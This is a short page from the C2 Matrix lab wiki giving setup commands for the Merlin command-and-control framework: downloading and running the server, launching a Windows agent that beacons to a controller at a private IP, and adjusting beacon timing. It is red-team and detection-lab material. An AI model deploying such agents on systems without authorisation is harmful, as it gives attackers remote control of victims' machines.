C2 Matrix
Search…
C2 Matrix
The C2 Matrix
SANS Slingshot C2 Matrix VM
Contribute
Lab Infrastructure
C2 Matrix Eval Lab
Basic Lab
Virtual Machines with C2s
Docker
Resources
C2
Caldera
Covenant
Empire
Faction
ibombshell
Koadic
Merlin
Mythic
Nuages
PoshC2
PowerHub
SilentTrinity
Sliver
SCYTHE
TrevorC2
Attack Infrastructure
Resources
Redirectors/Relays
Detection
Basics
Beacons
JA3/JA3S Hashes
JARM
Powered By
GitBook
Merlin
Install Merlin
apt install golang
mkdir /opt/merlin
cd /opt/merlin
wget https://github.com/Ne0nd0g/merlin/releases/download/v0.8.0/merlinServer-Linux-x64-v0.8.0.BETA.7z
7z x merlinServer-Linux-x64-v0.8.0.BETA.7z
Run Merlin
cd
/opt/merlin
sudo
./merlinServer-Linux-x64 -i
<
IP
>
-psk
<
key
>
Agent Deployment
Download agent from releases:
https://github.com/Ne0nd0g/merlin/releases
merlinAgent-Windows-x64.exe -url https://10.0.0.194:443 -psk
test
Interact with Agent
interact
<
Agent ID
>
Visit wiki for additional information on interacting with an agent:
https://github.com/Ne0nd0g/merlin/wiki/Merlin-Server-Agent-Menu
Test beacon delay
set sleep 10s
set skew 5
C2 - Previous
Koadic
Next - C2
Mythic
Last modified
2yr ago
Copy link
Outline
Install Merlin
Run Merlin
Agent Deployment
Interact with Agent